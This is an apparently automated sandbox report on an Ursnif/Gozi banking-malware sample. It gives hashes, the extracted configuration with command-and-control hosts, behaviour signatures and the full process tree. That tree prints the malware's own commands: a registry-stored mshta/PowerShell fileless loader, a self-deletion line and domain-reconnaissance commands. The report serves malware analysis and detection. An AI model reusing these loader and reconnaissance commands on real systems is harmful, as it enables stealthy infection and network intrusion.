Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
25/12/2022, 16:04
Static task
static1
Behavioral task
behavioral1
Sample
ursnif.exe
Resource
win7-20221111-en
General
-
Target
ursnif.exe
-
Size
332KB
-
MD5
a03b2c0e5af189c08c70a6532ab48300
-
SHA1
b4d68c7f0bc9a592f500de86e0125dd1e2a36089
-
SHA256
112b84b09d2051376879f697f03190240132b87bbac0d069175bd3039d492f56
-
SHA512
c77f652b8300763e9ebd5c93b85bfd5c8ef904c03f0ecc1fac9128fea211058980402ca511d71fa07d95fedb74abc8658a1bfc636f749c2022e64e96d427f3a7
-
SSDEEP
6144:4i7CLqelbeSO8XNHlreeOxeZ61hJFIJfVAVrwU+:jGGWbRNHlKel6PHgtyQ
Malware Config
Extracted
gozi
Extracted
gozi
3000
trackingg-protectioon.cdn4.mozilla.net
185.189.151.38
31.214.157.31
protectioon.cdn4.mozilla.net
9185.212.47.59
194.76.224.95
194.76.227.159
91.241.93.111
-
base_path
/fonts/
-
build
250249
-
exe_type
loader
-
extension
.bak
-
server_id
50
Extracted
gozi
3000
protectioon.cdn4.mozilla.net
194.76.224.95
194.76.227.159
91.241.93.111
31.214.157.31
9185.212.47.59
trackingg-protectioon.cdn4.mozilla.net
185.189.151.38
-
base_path
/fonts/
-
build
250249
-
exe_type
worker
-
extension
.bak
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1248 set thread context of 2712 1248 powershell.exe 63 PID 2712 set thread context of 3416 2712 Explorer.EXE 52 PID 2712 set thread context of 3688 2712 Explorer.EXE 58 PID 2712 set thread context of 3436 2712 Explorer.EXE 95 PID 3436 set thread context of 2512 3436 cmd.exe 98 PID 2712 set thread context of 4804 2712 Explorer.EXE 103 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2264 1144 WerFault.exe 78 -
Discovers systems in the same network 1 TTPs 3 IoCs
pid Process 4972 net.exe 4488 net.exe 4700 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2528 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2348 systeminfo.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2512 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2512 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1144 ursnif.exe 1144 ursnif.exe 1248 powershell.exe 1248 powershell.exe 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 1248 powershell.exe 2712 Explorer.EXE 2712 Explorer.EXE 2712 Explorer.EXE 3436 cmd.exe 2712 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 52 IoCs
description pid Process Token: SeDebugPrivilege 1248 powershell.exe Token: SeShutdownPrivilege 2712 Explorer.EXE Token: SeCreatePagefilePrivilege 2712 Explorer.EXE Token: SeShutdownPrivilege 2712 Explorer.EXE Token: SeCreatePagefilePrivilege 2712 Explorer.EXE Token: SeShutdownPrivilege 2712 Explorer.EXE Token: SeCreatePagefilePrivilege 2712 Explorer.EXE Token: SeIncreaseQuotaPrivilege 3948 WMIC.exe Token: SeSecurityPrivilege 3948 WMIC.exe Token: SeTakeOwnershipPrivilege 3948 WMIC.exe Token: SeLoadDriverPrivilege 3948 WMIC.exe Token: SeSystemProfilePrivilege 3948 WMIC.exe Token: SeSystemtimePrivilege 3948 WMIC.exe Token: SeProfSingleProcessPrivilege 3948 WMIC.exe Token: SeIncBasePriorityPrivilege 3948 WMIC.exe Token: SeCreatePagefilePrivilege 3948 WMIC.exe Token: SeBackupPrivilege 3948 WMIC.exe Token: SeRestorePrivilege 3948 WMIC.exe Token: SeShutdownPrivilege 3948 WMIC.exe Token: SeDebugPrivilege 3948 WMIC.exe Token: SeSystemEnvironmentPrivilege 3948 WMIC.exe Token: SeRemoteShutdownPrivilege 3948 WMIC.exe Token: SeUndockPrivilege 3948 WMIC.exe Token: SeManageVolumePrivilege 3948 WMIC.exe Token: 33 3948 WMIC.exe Token: 34 3948 WMIC.exe Token: 35 3948 WMIC.exe Token: 36 3948 WMIC.exe Token: SeIncreaseQuotaPrivilege 3948 WMIC.exe Token: SeSecurityPrivilege 3948 WMIC.exe Token: SeTakeOwnershipPrivilege 3948 WMIC.exe Token: SeLoadDriverPrivilege 3948 WMIC.exe Token: SeSystemProfilePrivilege 3948 WMIC.exe Token: SeSystemtimePrivilege 3948 WMIC.exe Token: SeProfSingleProcessPrivilege 3948 WMIC.exe Token: SeIncBasePriorityPrivilege 3948 WMIC.exe Token: SeCreatePagefilePrivilege 3948 WMIC.exe Token: SeBackupPrivilege 3948 WMIC.exe Token: SeRestorePrivilege 3948 WMIC.exe Token: SeShutdownPrivilege 3948 WMIC.exe Token: SeDebugPrivilege 3948 WMIC.exe Token: SeSystemEnvironmentPrivilege 3948 WMIC.exe Token: SeRemoteShutdownPrivilege 3948 WMIC.exe Token: SeUndockPrivilege 3948 WMIC.exe Token: SeManageVolumePrivilege 3948 WMIC.exe Token: 33 3948 WMIC.exe Token: 34 3948 WMIC.exe Token: 35 3948 WMIC.exe Token: 36 3948 WMIC.exe Token: SeShutdownPrivilege 2712 Explorer.EXE Token: SeCreatePagefilePrivilege 2712 Explorer.EXE Token: SeDebugPrivilege 2528 tasklist.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2712 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2108 wrote to memory of 1248 2108 mshta.exe 89 PID 2108 wrote to memory of 1248 2108 mshta.exe 89 PID 1248 wrote to memory of 4340 1248 powershell.exe 91 PID 1248 wrote to memory of 4340 1248 powershell.exe 91 PID 4340 wrote to memory of 3008 4340 csc.exe 92 PID 4340 wrote to memory of 3008 4340 csc.exe 92 PID 1248 wrote to memory of 1996 1248 powershell.exe 93 PID 1248 wrote to memory of 1996 1248 powershell.exe 93 PID 1996 wrote to memory of 4788 1996 csc.exe 94 PID 1996 wrote to memory of 4788 1996 csc.exe 94 PID 1248 wrote to memory of 2712 1248 powershell.exe 63 PID 1248 wrote to memory of 2712 1248 powershell.exe 63 PID 1248 wrote to memory of 2712 1248 powershell.exe 63 PID 1248 wrote to memory of 2712 1248 powershell.exe 63 PID 2712 wrote to memory of 3416 2712 Explorer.EXE 52 PID 2712 wrote to memory of 3416 2712 Explorer.EXE 52 PID 2712 wrote to memory of 3436 2712 Explorer.EXE 95 PID 2712 wrote to memory of 3436 2712 Explorer.EXE 95 PID 2712 wrote to memory of 3436 2712 Explorer.EXE 95 PID 2712 wrote to memory of 3416 2712 Explorer.EXE 52 PID 2712 wrote to memory of 3416 2712 Explorer.EXE 52 PID 2712 wrote to memory of 3688 2712 Explorer.EXE 58 PID 2712 wrote to memory of 3688 2712 Explorer.EXE 58 PID 2712 wrote to memory of 3688 2712 Explorer.EXE 58 PID 2712 wrote to memory of 3688 2712 Explorer.EXE 58 PID 2712 wrote to memory of 3436 2712 Explorer.EXE 95 PID 2712 wrote to memory of 3436 2712 Explorer.EXE 95 PID 3436 wrote to memory of 2512 3436 cmd.exe 98 PID 3436 wrote to memory of 2512 3436 cmd.exe 98 PID 3436 wrote to memory of 2512 3436 cmd.exe 98 PID 3436 wrote to memory of 2512 3436 cmd.exe 98 PID 3436 wrote to memory of 2512 3436 cmd.exe 98 PID 2712 wrote to memory of 3612 2712 Explorer.EXE 101 PID 2712 wrote to memory of 3612 2712 Explorer.EXE 101 PID 2712 wrote to memory of 4804 2712 Explorer.EXE 103 PID 2712 wrote to memory of 4804 2712 Explorer.EXE 103 PID 2712 wrote to memory of 4804 2712 Explorer.EXE 103 PID 2712 wrote to memory of 4804 2712 Explorer.EXE 103 PID 3612 wrote to memory of 3948 3612 cmd.exe 105 PID 3612 wrote to memory of 3948 3612 cmd.exe 105 PID 3612 wrote to memory of 4756 3612 cmd.exe 106 PID 3612 wrote to memory of 4756 3612 cmd.exe 106 PID 2712 wrote to memory of 4804 2712 Explorer.EXE 103 PID 2712 wrote to memory of 4804 2712 Explorer.EXE 103 PID 2712 wrote to memory of 3108 2712 Explorer.EXE 107 PID 2712 wrote to memory of 3108 2712 Explorer.EXE 107 PID 2712 wrote to memory of 1528 2712 Explorer.EXE 109 PID 2712 wrote to memory of 1528 2712 Explorer.EXE 109 PID 1528 wrote to memory of 2348 1528 cmd.exe 111 PID 1528 wrote to memory of 2348 1528 cmd.exe 111 PID 2712 wrote to memory of 3972 2712 Explorer.EXE 113 PID 2712 wrote to memory of 3972 2712 Explorer.EXE 113 PID 2712 wrote to memory of 724 2712 Explorer.EXE 115 PID 2712 wrote to memory of 724 2712 Explorer.EXE 115 PID 724 wrote to memory of 4972 724 cmd.exe 117 PID 724 wrote to memory of 4972 724 cmd.exe 117 PID 2712 wrote to memory of 4920 2712 Explorer.EXE 118 PID 2712 wrote to memory of 4920 2712 Explorer.EXE 118 PID 2712 wrote to memory of 2532 2712 Explorer.EXE 120 PID 2712 wrote to memory of 2532 2712 Explorer.EXE 120 PID 2532 wrote to memory of 4776 2532 cmd.exe 122 PID 2532 wrote to memory of 4776 2532 cmd.exe 122 PID 2712 wrote to memory of 1476 2712 Explorer.EXE 123 PID 2712 wrote to memory of 1476 2712 Explorer.EXE 123
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3416
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3688
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Users\Admin\AppData\Local\Temp\ursnif.exe"C:\Users\Admin\AppData\Local\Temp\ursnif.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1144 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 5643⤵
- Program crash
PID:2264
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yhe0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yhe0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\16F27831-7D02-B8E1-B7AA-016CDB7EC560\\\ReturnStop'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name mwufrj -value gp; new-alias -name itulkmq -value iex; itulkmq ([System.Text.Encoding]::ASCII.GetString((mwufrj "HKCU:Software\AppDataLow\Software\Microsoft\16F27831-7D02-B8E1-B7AA-016CDB7EC560").FileDesktop))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rsv205da\rsv205da.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5FF.tmp" "c:\Users\Admin\AppData\Local\Temp\rsv205da\CSCCD4A9EFF77C74B0886D79F3369619251.TMP"5⤵PID:3008
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5w1mv31y\5w1mv31y.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC786.tmp" "c:\Users\Admin\AppData\Local\Temp\5w1mv31y\CSC7FDF6AF712CA465C86D5F2A9DC411797.TMP"5⤵PID:4788
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\ursnif.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2512
-
-
-
C:\Windows\system32\cmd.execmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get domain3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Windows\system32\more.commore3⤵PID:4756
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:4804
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:3108
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:2348
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:3972
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:4972
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:4920
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:4776
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:1476
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:4744
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:700
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:2216
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:2320
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:4740
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:2352
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:3384
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:2408
-
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:1568
-
C:\Windows\system32\net.exenet config workstation3⤵PID:4980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:4556
-
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:4232
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:4576
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:4672
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:1084
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:3960
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:1144
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:5020
-
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:980
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:4488
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:3304
-
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\D6B1.bin1"2⤵PID:3952
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:4700
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1144 -ip 11441⤵PID:4336
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD51d3b7229d1d816aa41204b918f8963ac
SHA18d21d88488a200bf0427a4bba44db8860e6551b7
SHA256fa3e2d5b41fa167af3bf8375e07e742c8a67a910a1ce99cfc6cdd19422830116
SHA512cfadba7d21dc342e472f7156470b45ce130c739930bbcc74891769fde797eadb4494951fdd50862553682a582d40c59f50830a278cf96e919275d3ce4f89c20c
-
Filesize
33B
MD51d0b80729108e13e765fa8b5dbc325b0
SHA1155a3f53b166d45c70f4444c2603b6ceb95d4f9e
SHA2564078dfa5ba175d50a27b6f7d1eb134da661cf559038b601986bc27beddb3a59b
SHA512f3adc98b8a9288f80bf023cb691cf4d8e78fa7fa5e6e22eced1c6dcec9ea0e842fef609a06c92d2cd3d7c572e60aaaa4bb0a5821ab987b53f8ac68561b240b94
-
Filesize
2KB
MD5fd2dcd6b8f560dca6841ec655a2a325a
SHA1ab33f4246507c32aaf2c79568302f8f953a11b2f
SHA25640cb32d3044ceeefde4c0c4d000baca4011d7fda0d46f6e69fd72599b95e2369
SHA512b055aab5a72052f3bf3d11362bde4ee5e5d4897ac655cd92680ddd794867e3647c0f0e46be8cde592d91e296782cb0d934cd7b3e477802bf26f968e6b231d6e8
-
Filesize
2KB
MD5fd2dcd6b8f560dca6841ec655a2a325a
SHA1ab33f4246507c32aaf2c79568302f8f953a11b2f
SHA25640cb32d3044ceeefde4c0c4d000baca4011d7fda0d46f6e69fd72599b95e2369
SHA512b055aab5a72052f3bf3d11362bde4ee5e5d4897ac655cd92680ddd794867e3647c0f0e46be8cde592d91e296782cb0d934cd7b3e477802bf26f968e6b231d6e8
-
Filesize
2KB
MD5b99cad650041910dd6b85ed0296f7d6c
SHA1ae0e537eab285fabb1f38d5f4de958db9e9969ca
SHA2563d12838d22ff21d05ad2d6141af4de35089d4fec5ccf4eeed988093753980df3
SHA5127852c0a806f800561193f4b8791878f434be2e1717e7979cde40e69405a507ce40b45108fdccc4055e664a060ecc44b8072017e17a9199b91e9b535942520f49
-
Filesize
2KB
MD5c8431849d3cd1e5b595cbda49e905072
SHA1fdb7cc98208ce9d61411bc5887dc8076565cfefa
SHA2563ec22ad608cbe0f9a4500d05f5d914a60ec0a9ae4c1d690ddc5ef8950d7ecdcd
SHA512f01a2fc8829ae41fae6aab81f601a9c16792d8526ecde318501cc903fc42ecbfec4ab88affab1f2a24161f15d57f045520938fe2632fcce95b74b057cff31367
-
Filesize
2KB
MD5c8431849d3cd1e5b595cbda49e905072
SHA1fdb7cc98208ce9d61411bc5887dc8076565cfefa
SHA2563ec22ad608cbe0f9a4500d05f5d914a60ec0a9ae4c1d690ddc5ef8950d7ecdcd
SHA512f01a2fc8829ae41fae6aab81f601a9c16792d8526ecde318501cc903fc42ecbfec4ab88affab1f2a24161f15d57f045520938fe2632fcce95b74b057cff31367
-
Filesize
9KB
MD5af6762007106b9fcc10ba55825daa01a
SHA1b409550961bd67c473ca7ad0d2271e0e3ef992c9
SHA25694bb97b63ce8de4fc9e502c40059d894cc51a3b9b8c67dc1c6e13c1c1099a5e3
SHA512c25edb3348e6ae0be6cbc027beac8e7ab54bc24e4cb8dbde83023bbcd897a52b5e623a1db9b0652b10367718b51c375a0be2f3f3689df0b0694b2c2fab2bd73d
-
Filesize
9KB
MD5dd38e1d24fca3fc7aca07752a64fd1d9
SHA1b93cb3bb36b69f7ded3757386e7db1ca03d60b5e
SHA2562d41b7637a5055bddca9d9922469ebaffe2d227e72218ef6060fe9d16350223d
SHA5126355b73da5fb5c391731111a076a4b9a73d31d4486c285efe6b76d9be689bbc0b368c992ea4a4af4e2deda5595f7a4479d80e7ccf08adb82e93192a805f1ae97
-
Filesize
35KB
MD596d4e4b9c8418e3acb552e8e1a43301b
SHA18c843b4c18b0b6fc235ef0b98780ec6ec508ad29
SHA256fdb3db5573ed05489753073918d0dc47d6d4cba828a93ad82cce7d7ee1990396
SHA512dd343f0f278b7e89695b93f63524be2123ff4d80ed349725aa623a4e1806b059c77e4850c5b1696a1f4d1440cebd79305196f490de374e35abb320be38df7224
-
Filesize
35KB
MD596d4e4b9c8418e3acb552e8e1a43301b
SHA18c843b4c18b0b6fc235ef0b98780ec6ec508ad29
SHA256fdb3db5573ed05489753073918d0dc47d6d4cba828a93ad82cce7d7ee1990396
SHA512dd343f0f278b7e89695b93f63524be2123ff4d80ed349725aa623a4e1806b059c77e4850c5b1696a1f4d1440cebd79305196f490de374e35abb320be38df7224
-
Filesize
64KB
MD5bef5f8946ba0b27fc2b4448c9ad0c953
SHA13555c0b4b547efeffeca60cf1d0de217a11d7102
SHA256cab5a5051206e8e07b551731a185eb9823e0bcae5763b67005b6588fcc27e46d
SHA512f18ce7a6679c9a138c0c2ed64b5855019a71a5593e5656403f984697d77e316b30b829f7c1bed74d78cd9da62c1bd4aae48eae1063ee2aa624ac45388a238ea8
-
Filesize
64KB
MD5bef5f8946ba0b27fc2b4448c9ad0c953
SHA13555c0b4b547efeffeca60cf1d0de217a11d7102
SHA256cab5a5051206e8e07b551731a185eb9823e0bcae5763b67005b6588fcc27e46d
SHA512f18ce7a6679c9a138c0c2ed64b5855019a71a5593e5656403f984697d77e316b30b829f7c1bed74d78cd9da62c1bd4aae48eae1063ee2aa624ac45388a238ea8
-
Filesize
64KB
MD5549f29f4765edd3eaa3b6e78dbfe473f
SHA12a30fa7a79db9606b709c9c5300645e953b4d548
SHA25638cbc2d03a4e10446fd0222b2b96c43ce8d480bf63ea6ac48f08bf691706e085
SHA51278371802d1cb6615e587ecfed09459dc65056f0f41fb1c67cbd099a4c614b3a8282c12507ad6710377251f4808debc8b4589190da886895b6719d538b2d0ee1c
-
Filesize
64KB
MD5549f29f4765edd3eaa3b6e78dbfe473f
SHA12a30fa7a79db9606b709c9c5300645e953b4d548
SHA25638cbc2d03a4e10446fd0222b2b96c43ce8d480bf63ea6ac48f08bf691706e085
SHA51278371802d1cb6615e587ecfed09459dc65056f0f41fb1c67cbd099a4c614b3a8282c12507ad6710377251f4808debc8b4589190da886895b6719d538b2d0ee1c
-
Filesize
64KB
MD5e5d63308709a076472fd1a357f8af240
SHA12ffe6177ffd738b4d2445491ef1601454ccfd105
SHA25631db326714bc598879a7299098a497273c6e388693403c8412380a44966d0b52
SHA5127dc44c1b9fdf1db1d11d5721d33fc0c1960a4b9f76c1b5ca64019eaedcedf61a01c0a60367a359c64fe78aadf1af50a5a962f6f98e7d0f61952efff652ecf31b
-
Filesize
64KB
MD52af8bcf3e92be8baa148b83f86338415
SHA12da0c75e6c1ff40068900915f2ff3a1181d7a1c9
SHA256c578a45775b466fb1d7ff6efd8f47c91d1fbf01680fb2a2be1eb4e81ae8b77ea
SHA5122f05752d0cdebc137294e4999e110e418db6ddc5b8c520d061d14d211695b16161fd78aa760fbd7e8bad9da5943fe307a47b3e03658efb3edb2f78b1515096e3
-
Filesize
64KB
MD515b833eed2259480cadad7817320c44b
SHA15913b2d156128524b3a8b468f5814345633cca7e
SHA256d124fc66529e96576ce17a5a33c9333de403cad8655640122f72b9cd81742944
SHA512046b8b19a175bd572008fd98794a2a54b026f0a215b7ec92644ac44f4d823c01acc1ae21004691b3eb73ca2584ae30a51c911e7f64281343669abad180aacf7e
-
Filesize
1KB
MD5740b70a81a19c2778e67ab7302b1ccc9
SHA1b77a877e7f43fea790656239e9c3b6c80547ad53
SHA256a0a95f159ac866d64439657f93135774edf6a7b39f9c8893a1b44ff41f054de0
SHA51299ff3b2e4dab79721a332a0763f122b3d98e870fe5acfcbaf5952ad7c00cacdb8caba1a79868eb362e7ade26bb7ceb2a398e9ac423006eb055aff8f2f935aa24
-
Filesize
1KB
MD536625f026449a00ff039d15c1f48f44a
SHA1f233b2a3fefc705fb1aa52bca0f8f20a9df90d70
SHA25618225254b7df0013ccc1c943a8388893a6108e03cb01fe5b956fc3044ba64c21
SHA5125e4f6817c8ac77906a4be0dff781204036e24f9e82ee6af452b745530b408a07a762b4c805b484d3c3f883267ba73db07c2242f1b42e4acc26d951fea3ea84b0
-
Filesize
3KB
MD56a540a0a3496dd3dd771d9f465e39572
SHA135b6d287bec65b815e1debe4b8739217384b29f4
SHA2568bb2c8ebc070a98620c304e29d5b2fbd85abb65eef213883ee28e08e19d78092
SHA512974cb8103b83e3f22e6e01166e1abab35d2278953491748bf6ab768f5e936b3c2c3ebb61d96b6814e0192df94ed5acd5168400467ad87c0901d9be06234be3bb
-
Filesize
408B
MD50a5374e53f44ac8b609707a893f72b21
SHA183ec00746897bcacf4c5a049b7e090d057f62cf9
SHA2560388c68b7b848cb08941edbfe4bcaa8f6df3c461df1c9a7542103e279f64c5f9
SHA512ce62cb7723a6fcb5448c7c096c293a503662888f75f1a92ea8a9a15955e82ad6f7773829604633782f0e3e8d5bb07286bc281a94d2f99f0f57d4cea4e873cdd4
-
Filesize
369B
MD553584adc928bbe9e89ee7110145c7275
SHA108be543d3c1d3baef85b47fc57d5c81f0deeaab1
SHA25601124c86e2f117866bfbc782a0492a9833535dc899be080a9119c76a2f463106
SHA512410603200bc767b74e2a618c3c7b330c28396d2482dbb36cc3967a0d2de19aa603366216887ddc48fc499987d0fc926d0391bb7892a82ad8dceb16251f7aa916
-
Filesize
652B
MD517b885c9a3378c560cfa8982c48c327e
SHA19b8e438f90abc0996fd3412ce89f4a4099d8ae1c
SHA256c146a03d59e2e1efac077792d76087660fdf0357d4bd7c64c3d3e76487b869ec
